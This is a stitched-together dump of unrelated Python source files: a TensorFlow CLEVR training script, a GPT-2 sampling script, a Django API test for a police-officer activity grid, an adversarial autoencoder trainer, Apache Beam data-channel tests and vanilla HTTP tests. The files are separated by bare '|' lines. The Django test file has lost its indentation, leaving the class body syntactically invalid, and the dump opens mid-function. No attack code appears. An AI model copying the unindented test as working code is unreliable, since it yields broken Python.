        f.write('\n'.join(map(lambda x: str(x[1]), items)))
    print("Results written to " + with_ids + " and " + without_ids)
def evaluate(sess, model_val, n_batches, test_writer, global_step, trial,
             tuner, acc_train):
    """Evaluate the validation model over n_batches and log the results.

    Averages accuracy and loss across the batches, writes them as TF
    summaries keyed by *trial*, prints a progress report, and (when a tuner
    is supplied) reports the validation accuracy as the tuning measure.

    Returns:
        The mean validation accuracy.
    """
    start_time = time.time()
    total_acc = 0
    total_loss = 0
    for _ in range(n_batches):
        batch_acc, batch_loss, = sess.run([model_val.acc, model_val.loss])
        total_acc += batch_acc
        total_loss += batch_loss
    mean_acc = total_acc / n_batches
    mean_loss = total_loss / n_batches
    # Write summaries
    summary_values = [summary_pb2.Summary.Value(tag='summary/accuracy_val',
                                                simple_value=mean_acc),
                      summary_pb2.Summary.Value(tag='summary/loss_val',
                                                simple_value=mean_loss)]
    test_writer.add_summary(summary_pb2.Summary(value=summary_values), trial)
    print('Step {:d} Trial {:d}'.format(global_step, trial))
    print('Evaluation took: {:0.2f}s'.format(time.time() - start_time))
    print('Accuracy training: {:0.4f}'.format(acc_train))
    print('Accuracy validation: {:0.4f}'.format(mean_acc))
    sys.stdout.flush()
    # Report the test set precision as the measure
    if tuner:
        tuner.report_measure(mean_acc, trial)
    return mean_acc
def run_training(hparams, train_dir, tuner):
    """Train.

    Builds training and validation graphs from the CLEVR tfrecords, restores
    the latest checkpoint when one exists, trains until FLAGS.num_steps,
    periodically evaluates and checkpoints on improvement, then runs a final
    validation pass and the test set.

    Args:
        hparams: A HParam object with the hyperparameters to use.
        train_dir: Path of a directory where to log training events.
        tuner: Optional hyperparameter Tuner object. TODO(iga): Remove
    """
    if not FLAGS.train_dir:
        # Fix: corrected 'traning' typo in the error message.
        raise ValueError('training directory is not provided.')
    if not FLAGS.data_dir:
        raise ValueError('data directory is not provided.')
    if not tf.gfile.Exists(train_dir):
        tf.gfile.MakeDirs(train_dir)
    print('Hyperparameters:')
    # Fix: .iteritems() is Python-2-only; .items() behaves the same here and
    # is portable (matches the sorted(ans.items()) usage in run_test).
    for key, val in sorted(hparams.values().items()):
        print(key, val)
    with tf.gfile.FastGFile(os.path.join(train_dir, 'hparams'), 'w') as f:
        json.dump(hparams.to_json(), f)
    tf.reset_default_graph()
    ######################### Tasks to train ###################################
    data_train = clevr.data_from_tfrecord(
        FLAGS.data_dir, 'train', FLAGS.batch_size, hparams)
    data_val = clevr.data_from_tfrecord(
        FLAGS.data_dir, 'val', FLAGS.batch_size, hparams)
    ######################### Build the network ################################
    tf.train.get_or_create_global_step()
    model_train = network.Model(hparams, constants.config)
    model_train.build(data_train, FLAGS.batch_size, is_training=True)
    merged = tf.summary.merge_all()
    test_writer = tf.summary.FileWriter(train_dir + '/tb', flush_secs=120)
    # Report parameter statistics
    if FLAGS.report_param_stat:
        param_stats = tf.contrib.tfprof.model_analyzer.print_model_analysis(
            tf.get_default_graph(),
            tfprof_options=tf.contrib.tfprof.model_analyzer.
            TRAINABLE_VARS_PARAMS_STAT_OPTIONS)
        print('total_params: {:d}'.format(param_stats.total_parameters))
        PARAM_LIMIT = 2905217
        # Abort tuning runs whose hparams blow up the parameter count.
        if param_stats.total_parameters > 1.1 * PARAM_LIMIT:
            raise tf.errors.ResourceExhaustedError(None, None,
                "Hyperparams resulted in too many params: %d" %
                param_stats.total_parameters)
    model_val = network.Model(hparams, constants.config)
    # TODO(gryang): Setting is_training=False doesn't seem to work correctly
    model_val.build(data_val, FLAGS.batch_size, is_training=True)
    saver = tf.train.Saver()
    ########################## Train the network ###############################
    print("Train dir: " + train_dir)
    checkpoint_path = train_dir + '/checkpoints'
    acc_train_ = 0
    best_acc_val_ = 0
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        cpkt_path = tf.train.latest_checkpoint(checkpoint_path)
        if cpkt_path is not None:
            print("Restoring model from: " + cpkt_path)
            saver.restore(sess, cpkt_path)
            print("Done restoring model")
        else:
            print("Did not find checkpoint at: " + checkpoint_path)
        global_step = sess.run(tf.train.get_global_step())
        print("Initial global step value: " + str(global_step))
        print("Running until global step is: " + str(FLAGS.num_steps))
        sys.stdout.flush()
        # 'trial' is the example count, used as the x-axis for summaries.
        trial = global_step * FLAGS.batch_size
        while global_step <= FLAGS.num_steps:
            trial = global_step * FLAGS.batch_size
            try:
                # Evaluation
                if global_step > 0 and global_step % FLAGS.display_step == 0:
                    acc_val_ = evaluate(sess, model_val, n_batches=300,
                                        test_writer=test_writer,
                                        global_step=global_step,
                                        trial=trial, tuner=tuner,
                                        acc_train=acc_train_)
                    # Checkpoint only on validation improvement.
                    if acc_val_ > best_acc_val_:
                        best_acc_val_ = acc_val_
                        save_path = saver.save(sess, train_dir + '/checkpoints/model.ckpt')
                        print('Model saved in file {:s}'.format(save_path))
                if global_step > 0 and global_step % FLAGS.summary_step == 0:
                    # Training step that also records merged summaries.
                    global_step, summary, _, acc_train_ = sess.run(
                        [tf.train.get_global_step(),
                         merged,
                         model_train.train_step,
                         model_train.acc])
                    test_writer.add_summary(summary, trial)
                else:
                    # Training
                    global_step, _, acc_train_ = sess.run(
                        [tf.train.get_global_step(),
                         model_train.train_step,
                         model_train.acc])
            except KeyboardInterrupt:
                print('Training interrupted by user.')
                break
        print("Stopping at global step value: " + str(global_step))
        # Test the final accuracy and record it as the last summary point
        # 15k is the number of images in validation set
        n_batches = 15000 // (FLAGS.batch_size // constants.QUESTIONS_PER_IMAGE)
        print("Running final validation step over %d batches" % n_batches)
        final_trial = trial + FLAGS.display_step * FLAGS.batch_size
        print("Logging this eval under trial ", final_trial)
        evaluate(sess, model_val, n_batches=n_batches, test_writer=test_writer,
                 global_step=global_step,
                 trial=final_trial,
                 tuner=tuner,
                 acc_train=acc_train_)
    test_writer.close()
    # Run the best network on the test set
    run_test(train_dir, train_dir, hparams)
def main(_):
    """Entry point: build hparams, then either run the test set or train."""
    defaults = get_default_hparams_dict()
    hparams = tf.contrib.training.HParams(**defaults)
    # Command-line --hparams values override the defaults.
    hparams = hparams.parse(FLAGS.hparams)
    if FLAGS.clevr_test_output:
        run_test(FLAGS.train_dir, FLAGS.clevr_test_output, hparams)
    else:
        run_training(hparams, FLAGS.train_dir, None)


if __name__ == '__main__':
    tf.app.run(main)
|
<filename>scripts/generate.py
#!/usr/bin/env python3
import os
import re
import json
from datetime import datetime
from collections import defaultdict
import click
import numpy as np
import tensorflow as tf
from src import model, sample, encoder
# A sentence: a run of non-terminator characters followed by .!? or end-of-text.
SENTENCE_PATTERN = re.compile(r'[^.!?]+(?:[.!?]|$)')


def split_sentences(text):
    """Split *text* into sentences.

    Re-joins fragments that the naive terminator split broke apart:
    decimal numbers ("3." + "14") and the abbreviation "Mr.".
    """
    result = []
    for raw in SENTENCE_PATTERN.findall(text):
        piece = raw.strip()
        if not piece:
            continue
        if result:
            prev = result[-1]
            # "3." followed by "14..." is a split decimal number; glue it back
            # without a separating space.
            if re.match(r'[0-9][\.,]', prev[-2:]) and re.match(r'[0-9]', piece[0]):
                result[-1] = prev + piece
                continue
            # "Mr." is an abbreviation, not a sentence end; rejoin with a space.
            if prev.endswith(' Mr.'):
                result[-1] = prev + ' ' + piece
                continue
        result.append(piece)
    return result
def postprocess(hint, text):
    """Append the first sentence of *text*'s first line to *hint*.

    Falls back to returning *hint* unchanged when the generated text is
    blank or yields no sentences.
    """
    cleaned = text.strip()
    if not cleaned:
        return hint
    leading_line = cleaned.split('\n')[0]
    parts = split_sentences(leading_line)
    if not parts:
        return hint
    return hint + ' ' + parts[0]
def generate(hints, model_name='345M', seed=None,
             nsamples=10, batch_size=1, length=None,
             temperature=1, top_k=0, top_p=1, models_dir='models'):
    """Generate GPT-2 continuations for each hint string.

    Args:
        hints: iterable of prompt strings.
        model_name: model subdirectory under *models_dir* (e.g. '345M').
        seed: integer seed for numpy and TF randomness; None for nondeterministic.
        nsamples: samples to draw per hint; must be divisible by batch_size.
        batch_size: prompts per sess.run; falsy values are coerced to 1.
        length: tokens to generate; defaults to half the model context window.
        temperature, top_k, top_p: sampling parameters forwarded to
            sample.sample_sequence.
        models_dir: root directory holding model checkpoints (~ and env vars
            are expanded).

    Returns:
        dict mapping each hint to a set of post-processed generated texts
        (a set, so duplicate samples collapse).

    Raises:
        ValueError: if *length* exceeds the model's context window.
    """
    models_dir = os.path.expanduser(os.path.expandvars(models_dir))
    batch_size = batch_size or 1
    assert nsamples % batch_size == 0
    enc = encoder.get_encoder(model_name, models_dir)
    hparams = model.default_hparams()
    with open(os.path.join(models_dir, model_name, 'hparams.json')) as f:
        hparams.override_from_dict(json.load(f))
    if length is None:
        # Default to half the context window to leave room for the prompt.
        length = hparams.n_ctx // 2
    elif length > hparams.n_ctx:
        raise ValueError("Can't get samples longer than window size: %s" % hparams.n_ctx)
    results = defaultdict(set)
    with tf.Session(graph=tf.Graph()) as sess:
        context = tf.placeholder(tf.int32, [batch_size, None])
        # Seed both numpy and TF before building the sampler so that graph
        # construction and sampling are reproducible for a given seed.
        np.random.seed(seed)
        tf.set_random_seed(seed)
        output = sample.sample_sequence(
            hparams=hparams, length=length,
            context=context,
            batch_size=batch_size,
            temperature=temperature, top_k=top_k, top_p=top_p
        )
        saver = tf.train.Saver()
        ckpt = tf.train.latest_checkpoint(os.path.join(models_dir, model_name))
        saver.restore(sess, ckpt)
        for hint in hints:
            print("[%s]begin to generate for: %s" % (datetime.utcnow(), hint))
            context_tokens = enc.encode(hint)
            for _ in range(nsamples // batch_size):
                # Feed the same prompt for every row of the batch; strip the
                # echoed prompt tokens from the model output.
                out = sess.run(output, feed_dict={
                    context: [context_tokens for _ in range(batch_size)]
                })[:, len(context_tokens):]
                for out_data in out:
                    text = enc.decode(out_data)
                    text = postprocess(hint, text.strip())
                    results[hint].add(text)
            print("[%s]finished generating for: %s" % (datetime.utcnow(), hint))
    return results
@click.command()
@click.option("-i", "--infile", required=True)
@click.option("-o", "--outfile", required=True)
@click.option("-m", "--model-name", required=True)
@click.option("-d", "--model-dir", required=True)
@click.option("-n", "--nsamples", type=int, default=10)
@click.option("-t", "--temperature", type=float, default=0.7)
def main(infile, outfile, model_name, model_dir, nsamples, temperature):
    """Read hints from *infile*, generate continuations, write TSV to *outfile*.

    Output format: one "<hint>\\t<generated text>" line per sample, with the
    samples for each hint sorted for determinism.
    """
    # Fix: the input file handle was opened without ever being closed; use a
    # context manager so it is released promptly.
    with open(infile) as fin:
        hints = [line.strip() for line in fin if line.strip()]
    results = generate(hints, model_name=model_name, models_dir=model_dir,
                       nsamples=nsamples, temperature=temperature)
    with open(outfile, 'w') as fout:
        for hint in hints:
            for new_text in sorted(results[hint]):
                print(f"{hint}\t{new_text}", file=fout)


if __name__ == '__main__':
    main()
|
<gh_stars>10-100
from datetime import datetime, date
import pytz
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from robber import expect
from activity_grid.factories import ActivityCardFactory, ActivityPairCardFactory
from activity_grid.models import ActivityPairCard
from data.cache_managers import cache_all
from data.factories import OfficerFactory, OfficerAllegationFactory, AllegationFactory
from data.models import Officer
class ActivityGridViewSetTestCase(APITestCase):
def test_list_return_exactly_80_items(self):
ActivityCardFactory.create_batch(50)
ActivityPairCardFactory.create_batch(50)
response = self.client.get(reverse('api-v2:activity-grid-list'))
expect(response.status_code).to.eq(status.HTTP_200_OK)
expect(response.data).to.have.length(80)
def test_list_item_content(self):
officer1 = OfficerFactory(
first_name='Jerome',
last_name='Finnigan',
birth_year=1950,
race='Asian',
gender='M',
appointed_date=datetime(2011, 1, 1, tzinfo=pytz.utc),
complaint_percentile=50.0,
allegation_count=6,
sustained_count=2,
rank='Police Officer',
)
officer2 = OfficerFactory(
first_name='Raymond',
last_name='Piwinicki',
birth_year=1960,
race='White',
gender='M',
appointed_date=datetime(2012, 1, 1, tzinfo=pytz.utc),
complaint_percentile=0.0,
allegation_count=1,
sustained_count=1,
rank='Police Officer',
)
allegation = AllegationFactory(incident_date=datetime(2014, 1, 1, tzinfo=pytz.utc))
OfficerAllegationFactory(
officer=officer1,
allegation=allegation,
final_finding='SU',
start_date=date(2014, 1, 1),
)
OfficerAllegationFactory(
officer=officer2,
allegation=allegation,
final_finding='SU',
start_date=date(2014, 1, 1),
)
OfficerAllegationFactory(
officer=officer1,
final_finding='SU',
allegation__incident_date=datetime(2016, 1, 1, tzinfo=pytz.utc),
start_date=date(2016, 1, 1)
)
OfficerAllegationFactory.create_batch(
4,
officer=officer1,
final_finding='NS',
start_date=date(2015, 1, 1),
allegation__incident_date=datetime(2015, 2, 20, tzinfo=pytz.utc)
)
ActivityCardFactory(officer=officer1, last_activity=datetime(2018, 12, 22, tzinfo=pytz.utc))
ActivityCardFactory(officer=officer2, last_activity=datetime(2018, 10, 15, tzinfo=pytz.utc))
ActivityPairCardFactory(
officer1=officer1, officer2=officer2, last_activity=datetime(2018, 5, 20, tzinfo=pytz.utc)
)
cache_all()
url = reverse('api-v2:activity-grid-list')
response = self.client.get(url)
expect(response.status_code).to.eq(status.HTTP_200_OK)
expect(response.data).to.eq([{
'id': officer1.id,
'full_name': '<NAME>',
'complaint_count': 6,
'sustained_count': 2,
'birth_year': 1950,
'race': 'Asian',
'gender': 'Male',
'rank': 'Police Officer',
'percentile_trr': '0.0000',
'percentile_allegation_internal': '0.0000',
'percentile_allegation_civilian': '50.0000',
'percentile_allegation': '50.0000',
'kind': 'single_officer',
}, {
'id': officer2.id,
'full_name': '<NAME>',
'complaint_count': 1,
'sustained_count': 1,
'birth_year': 1960,
'race': 'White',
'gender': 'Male',
'rank': 'Police Officer',
'percentile_trr': '0.0000',
'percentile_allegation_internal': '0.0000',
'percentile_allegation_civilian': '0.0000',
'percentile_allegation': '0.0000',
'kind': 'single_officer',
}, {
'officer1': {
'id': officer1.id,
'full_name': '<NAME>',
'birth_year': 1950,
'race': 'Asian',
'gender': 'Male',
'rank': 'Police Officer',
'percentile_trr': '0.0000',
'percentile_allegation_internal': '0.0000',
'percentile_allegation_civilian': '50.0000',
'percentile_allegation': '50.0000',
'complaint_count': 6,
'sustained_count': 2,
},
'officer2': {
'id': officer2.id,
'full_name': '<NAME>',
'birth_year': 1960,
'race': 'White',
'gender': 'Male',
'rank': 'Police Officer',
'percentile_trr': '0.0000',
'percentile_allegation_internal': '0.0000',
'percentile_allegation_civilian': '0.0000',
'percentile_allegation': '0.0000',
'complaint_count': 1,
'sustained_count': 1,
},
'coaccusal_count': 1,
'kind': 'coaccused_pair',
}])
def test_list_order(self):
    """Grid ordering: important cards first, then by recency of activity,
    with single-officer cards ranked ahead of pair cards in each tier."""
    # Three tiers per card type: important, explicit last_activity dates,
    # and factory-default activity.
    ActivityCardFactory.create_batch(3, important=True)
    ActivityCardFactory.create_batch(10, last_activity=datetime(2017, 5, 21, tzinfo=pytz.utc))
    ActivityCardFactory.create_batch(10)
    ActivityCardFactory.create_batch(17, last_activity=datetime(2017, 7, 21, tzinfo=pytz.utc))
    ActivityPairCardFactory.create_batch(3, important=True)
    ActivityPairCardFactory.create_batch(10, last_activity=datetime(2017, 5, 20, tzinfo=pytz.utc))
    ActivityPairCardFactory.create_batch(10)
    ActivityPairCardFactory.create_batch(17, last_activity=datetime(2017, 7, 20, tzinfo=pytz.utc))
    url = reverse('api-v2:activity-grid-list')
    cache_all()
    response = self.client.get(url)
    expect(response.status_code).to.eq(status.HTTP_200_OK)
    # (3 + 10 + 10 + 17) single-officer cards plus the same count of pair cards.
    expect(response.data).to.have.length(80)
    # Important single-officer cards come first...
    for item in response.data[:3]:
        activity_card = Officer.objects.get(pk=item['id']).activity_card
        expect(activity_card.important).to.be.true()
    # ...followed by important pair cards.
    for item in response.data[3:6]:
        pair_card = ActivityPairCard.objects.get(
            officer1_id=item['officer1']['id'], officer2_id=item['officer2']['id']
        )
        expect(pair_card.important).to.be.true()
    # Remaining cards are grouped newest-activity-first (July 2017 batches
    # before May 2017 batches), singles before pairs within a date tier.
    for item in response.data[6:23]:
        activity_card = Officer.objects.get(pk=item['id']).activity_card
        expect(activity_card.last_activity).to.eq(datetime(2017, 7, 21, tzinfo=pytz.utc))
    for item in response.data[23:40]:
        pair_card = ActivityPairCard.objects.get(
            officer1_id=item['officer1']['id'], officer2_id=item['officer2']['id']
        )
        expect(pair_card.last_activity).to.eq(datetime(2017, 7, 20, tzinfo=pytz.utc))
    for item in response.data[40:50]:
        activity_card = Officer.objects.get(pk=item['id']).activity_card
        expect(activity_card.last_activity).to.eq(datetime(2017, 5, 21, tzinfo=pytz.utc))
    for item in response.data[50:60]:
        pair_card = ActivityPairCard.objects.get(
            officer1_id=item['officer1']['id'], officer2_id=item['officer2']['id']
        )
        expect(pair_card.last_activity).to.eq(datetime(2017, 5, 20, tzinfo=pytz.utc))
|
import tensorflow as tf
import numpy as np
import time
from models import (Autoencoder,
Discriminator_x)
from models_mvtec import Autoencoder as Autoencoder_MVTEC
from models_mvtec import Discriminator_x as Discriminator_x_MVTEC
from utils.plotting import (generate_and_save_images,
generate_and_save_training,
save_training_curves)
from utils.training import print_epoch,save_checkpoint
from model_config import *
from .helper import end_routine
# Module-level optimizers shared by train_step (the tf.function closes over
# them).  The autoencoder uses Adam's default learning rate; the adversarial
# discriminator/generator pair use a smaller 1e-5 rate.
ae_optimizer = tf.keras.optimizers.Adam()
discriminator_optimizer = tf.keras.optimizers.Adam(1e-5)
generator_optimizer = tf.keras.optimizers.Adam(1e-5)
def ae_loss(x, x_hat):
    """Autoencoder reconstruction loss: cross entropy of x against x_hat."""
    reconstruction_loss = cross_entropy(x, x_hat)
    return reconstruction_loss
def discriminator_loss(real_output, fake_output, loss_weight):
    """Standard GAN discriminator loss, scaled by loss_weight.

    Real samples are pushed towards the 'ones' label and reconstructions
    towards the 'zeros' label.
    """
    loss_on_real = cross_entropy(tf.ones_like(real_output), real_output)
    loss_on_fake = cross_entropy(tf.zeros_like(fake_output), fake_output)
    return loss_weight * (loss_on_real + loss_on_fake)
def generator_loss(fake_output, loss_weight):
    """Generator loss: how well reconstructions fool the discriminator,
    scaled by loss_weight."""
    fooling_loss = cross_entropy(tf.ones_like(fake_output), fake_output)
    return loss_weight * tf.reduce_mean(fooling_loss)
@tf.function
def train_step(ae, discriminator, x):
    """Executes one training step and returns the loss.

    This function computes the loss and gradients, and uses the latter to
    update the model's parameters.  Returns (auto_loss, disc_loss, gen_loss).
    """
    # One tape per optimised objective; all forward passes happen inside the
    # context so each tape records the ops it needs.
    with tf.GradientTape() as ae_tape, \
            tf.GradientTape() as disc_tape, \
            tf.GradientTape() as gen_tape:
        x_hat = ae(x)
        # Discriminator returns a pair; c0/c1 (second outputs) are unused here.
        real_output, c0 = discriminator(x, training=True)
        fake_output, c1 = discriminator(x_hat, training=True)

        auto_loss = ae_loss(x, x_hat)
        disc_loss = discriminator_loss(real_output, fake_output, 1)
        gen_loss = generator_loss(fake_output, 1)

    gradients_of_ae = ae_tape.gradient(auto_loss, ae.trainable_variables)
    gradients_of_discriminator = disc_tape.gradient(disc_loss,
                                                    discriminator.trainable_variables)
    # The generator update only touches the decoder half of the autoencoder.
    gradients_of_generator = gen_tape.gradient(gen_loss,
                                               ae.decoder.trainable_variables)

    # Optimizers are module-level globals shared across calls.
    ae_optimizer.apply_gradients(zip(gradients_of_ae, ae.trainable_variables))
    discriminator_optimizer.apply_gradients(zip(gradients_of_discriminator,
                                                discriminator.trainable_variables))
    generator_optimizer.apply_gradients(zip(gradients_of_generator,
                                            ae.decoder.trainable_variables))
    return auto_loss, disc_loss, gen_loss
def train(ae, discriminator, train_dataset, test_images, test_labels, args):
    """Adversarially train the autoencoder/discriminator pair.

    Runs args.epochs epochs over train_dataset, saving images, checkpoints
    and loss curves under the 'DAE_disc' tag, and returns the trained
    (ae, discriminator) pair.  test_images/test_labels are accepted for
    interface compatibility with the other trainers but are not used here.
    """
    # Fix: the original local lists were named ae_loss/d_loss/g_loss, where
    # `ae_loss` shadowed the module-level ae_loss() loss function.
    ae_loss_hist, d_loss_hist, g_loss_hist = [], [], []
    for epoch in range(args.epochs):
        start = time.time()
        for image_batch in train_dataset:
            auto_loss, disc_loss, gen_loss = train_step(ae,
                                                        discriminator,
                                                        image_batch)
        generate_and_save_images(ae,
                                 epoch + 1,
                                 image_batch[:25, ...],
                                 'DAE_disc',
                                 args)
        save_checkpoint(ae, epoch, args, 'DAE_disc', 'ae')
        save_checkpoint(discriminator, epoch, args, 'DAE_disc', 'disc')

        # Only the final batch's losses are recorded for each epoch.
        ae_loss_hist.append(auto_loss)
        d_loss_hist.append(disc_loss)
        g_loss_hist.append(gen_loss)

        print_epoch('DAE_disc',
                    epoch,
                    time.time() - start,
                    {'AE Loss': auto_loss.numpy(),
                     'Discrimator Loss': disc_loss.numpy(),
                     'Generator Loss': gen_loss.numpy()},
                    None)

    generate_and_save_training([ae_loss_hist, d_loss_hist, g_loss_hist],
                               ['ae loss', 'disc loss', 'gen loss'],
                               'DAE_disc', args)
    generate_and_save_images(ae, epoch, image_batch[:25, ...], 'DAE_disc', args)
    return ae, discriminator
def main(train_dataset, train_images, train_labels, test_images, test_labels, test_masks, args):
    """Build the dataset-appropriate AE/discriminator pair, train them, and
    run the shared end_routine evaluation under the 'DAE_disc' tag."""
    # MVTEC gets its own architecture variants; everything else uses the
    # default models.
    if args.data == 'MVTEC':
        ae = Autoencoder_MVTEC(args)
        discriminator = Discriminator_x_MVTEC(args)
    else:
        ae = Autoencoder(args)
        discriminator = Discriminator_x(args)

    ae, discriminator = train(ae,
                              discriminator,
                              train_dataset,
                              test_images,
                              test_labels,
                              args)
    end_routine(train_images, test_images, test_labels, test_masks, [ae, discriminator], 'DAE_disc', args)


if __name__ == '__main__':
    # NOTE(review): main() requires seven positional arguments, so running
    # this module directly raises TypeError -- it appears intended to be
    # imported and driven by a caller that supplies the data and args.
    main()
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for apache_beam.runners.worker.data_plane."""
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import logging
import time
import unittest
import grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
from apache_beam.utils import thread_pool_executor
class DataChannelTest(unittest.TestCase):
    """Exercises Beam worker data channels (gRPC and in-memory) in both
    directions, with and without time-based buffer flushing."""

    def test_grpc_data_channel(self):
        self._grpc_data_channel_test()

    def test_time_based_flush_grpc_data_channel(self):
        self._grpc_data_channel_test(True)

    def _grpc_data_channel_test(self, time_based_flush=False):
        """Stand up a real gRPC server + client channel pair and run the
        shared channel test against them."""
        if time_based_flush:
            # 100ms buffer limit so unclosed streams still get flushed.
            data_servicer = data_plane.BeamFnDataServicer(
                data_buffer_time_limit_ms=100)
        else:
            data_servicer = data_plane.BeamFnDataServicer()
        worker_id = 'worker_0'
        data_channel_service = \
            data_servicer.get_conn_by_worker_id(worker_id)

        server = grpc.server(thread_pool_executor.shared_unbounded_instance())
        beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(data_servicer, server)
        # Port 0 lets the OS pick a free port.
        test_port = server.add_insecure_port('[::]:0')
        server.start()

        grpc_channel = grpc.insecure_channel('localhost:%s' % test_port)
        # Add workerId to the grpc channel
        grpc_channel = grpc.intercept_channel(
            grpc_channel, WorkerIdInterceptor(worker_id))
        data_channel_stub = beam_fn_api_pb2_grpc.BeamFnDataStub(grpc_channel)
        if time_based_flush:
            data_channel_client = data_plane.GrpcClientDataChannel(
                data_channel_stub, data_buffer_time_limit_ms=100)
        else:
            data_channel_client = data_plane.GrpcClientDataChannel(data_channel_stub)

        try:
            self._data_channel_test(
                data_channel_service, data_channel_client, time_based_flush)
        finally:
            # Close both ends before waiting so the waits can complete.
            data_channel_client.close()
            data_channel_service.close()
            data_channel_client.wait()
            data_channel_service.wait()

    def test_in_memory_data_channel(self):
        channel = data_plane.InMemoryDataChannel()
        self._data_channel_test(channel, channel.inverse())

    def _data_channel_test(self, server, client, time_based_flush=False):
        # Data channels are symmetric: test both directions.
        self._data_channel_test_one_direction(server, client, time_based_flush)
        self._data_channel_test_one_direction(client, server, time_based_flush)

    def _data_channel_test_one_direction(
            self, from_channel, to_channel, time_based_flush):
        """Write elements on from_channel and assert they arrive, correctly
        tagged, on to_channel.  With time_based_flush the streams are left
        open and the periodic flush is relied upon instead of close()."""
        transform_1 = '1'
        transform_2 = '2'

        # Single write.
        stream01 = from_channel.output_stream('0', transform_1)
        stream01.write(b'abc')
        if not time_based_flush:
            stream01.close()
        self.assertEqual(
            list(
                itertools.islice(to_channel.input_elements('0', [transform_1]), 1)),
            [
                beam_fn_api_pb2.Elements.Data(
                    instruction_id='0', transform_id=transform_1, data=b'abc')
            ])

        # Multiple interleaved writes to multiple instructions.
        stream11 = from_channel.output_stream('1', transform_1)
        stream11.write(b'abc')
        stream21 = from_channel.output_stream('2', transform_1)
        stream21.write(b'def')
        if not time_based_flush:
            stream11.close()
        self.assertEqual(
            list(
                itertools.islice(to_channel.input_elements('1', [transform_1]), 1)),
            [
                beam_fn_api_pb2.Elements.Data(
                    instruction_id='1', transform_id=transform_1, data=b'abc')
            ])
        if time_based_flush:
            # Wait to ensure stream21 is flushed before stream22.
            # Because the flush callback is invoked periodically starting from when a
            # stream is constructed, there is no guarantee that one stream's callback
            # is called before the other.
            time.sleep(0.1)
        else:
            stream21.close()
        stream22 = from_channel.output_stream('2', transform_2)
        stream22.write(b'ghi')
        if not time_based_flush:
            stream22.close()
        # Instruction '2' should yield both transforms' data, in flush order.
        self.assertEqual(
            list(
                itertools.islice(
                    to_channel.input_elements('2', [transform_1, transform_2]), 2)),
            [
                beam_fn_api_pb2.Elements.Data(
                    instruction_id='2', transform_id=transform_1, data=b'def'),
                beam_fn_api_pb2.Elements.Data(
                    instruction_id='2', transform_id=transform_2, data=b'ghi')
            ])
if __name__ == '__main__':
    # Surface INFO-level logs from the data plane when run directly.
    logging.getLogger().setLevel(logging.INFO)
    unittest.main()
|
<reponame>adamchainz/vanilla
import json
import gc
import pytest
import vanilla
import vanilla.http
# TODO: remove
import logging
logging.basicConfig()
class TestHTTP(object):
    """End-to-end tests for vanilla's HTTP client/server.

    NOTE(review): Python 2 era code -- uses xrange and print statements.
    Each test spins up a real listener on an ephemeral port and talks to it
    over a loopback connection.
    """

    def test_get_body(self):
        # GET returns the request path as the body; connection is reusable.
        h = vanilla.Hub()

        serve = h.http.listen()

        @h.spawn
        def _():
            conn = serve.recv()
            for request in conn:
                request.reply(vanilla.http.Status(200), {}, request.path)

        uri = 'http://localhost:%s' % serve.port
        conn = h.http.connect(uri)

        response = conn.get('/')
        response = response.recv()
        assert response.status.code == 200
        assert response.consume() == '/'
        assert response.headers['Date']

        response = conn.get('/toby').recv()
        assert response.status.code == 200
        assert response.consume() == '/toby'

        h.stop()
        assert not h.registered

    def test_get_chunked(self):
        # Server streams the body via a pipe -> chunked transfer encoding.
        h = vanilla.Hub()

        serve = h.http.listen()

        @h.spawn
        def _():
            conn = serve.recv()
            for request in conn:
                sender, recver = h.pipe()
                request.reply(vanilla.http.Status(200), {}, recver)
                for i in xrange(3):
                    h.sleep(10)
                    sender.send(str(i))
                if len(request.path) > 1:
                    sender.send(request.path[1:])
                sender.close()

        uri = 'http://localhost:%s' % serve.port
        conn = h.http.connect(uri)

        response = conn.get('/').recv()
        assert response.status.code == 200
        # Each chunk arrives as a separate body element.
        assert list(response.body) == ['0', '1', '2']

        response = conn.get('/peace').recv()
        assert response.status.code == 200
        assert list(response.body) == ['0', '1', '2', 'peace']

        h.stop()
        assert not h.registered

    def test_post(self):
        # POST echoes the request body back.
        h = vanilla.Hub()

        serve = h.http.listen()

        @h.spawn
        def _():
            conn = serve.recv()
            for request in conn:
                request.reply(vanilla.http.Status(200), {}, request.consume())

        uri = 'http://localhost:%s' % serve.port
        conn = h.http.connect(uri)

        response = conn.post('/').recv()
        assert response.status.code == 200
        assert response.consume() == ''

        response = conn.post('/', data='toby').recv()
        assert response.status.code == 200
        assert response.consume() == 'toby'

        h.stop()

    @pytest.mark.skipif(True, reason='TODO')
    def test_post_chunked(self):
        # Skipped: chunked request bodies are still TODO upstream.
        print
        print
        h = vanilla.Hub()

        serve = h.http.listen()

        @h.spawn
        def _():
            conn = serve.recv()
            for request in conn:
                sender, recver = h.pipe()
                request.reply(vanilla.http.Status(200), {}, recver)
                for data in request.body:
                    sender.send(data)
                sender.close()

        uri = 'http://localhost:%s' % serve.port
        conn = h.http.connect(uri)

        sender, recver = h.pipe()

        @h.spawn
        def _():
            for i in xrange(3):
                sender.send(str(i))
                h.sleep(10)
            sender.close()

        response = conn.post('/', data=recver).recv()
        for data in response.body:
            print data
        # h.stop()

    def test_post_form_encoded(self):
        # Dict data is form-encoded; the server parses it into form/form_multi.
        h = vanilla.Hub()
        serve = h.http.listen()
        uri = 'http://localhost:%s' % serve.port

        client = h.http.connect(uri)
        response = client.post('/', data={'k1': 'v1', 'k2': 'v2'})

        conn = serve.recv()
        request = conn.recv()
        assert request.form == {'k1': 'v1', 'k2': 'v2'}
        assert request.form_multi == {'k1': ['v1'], 'k2': ['v2']}

        request.reply(vanilla.http.Status(200), {}, '')
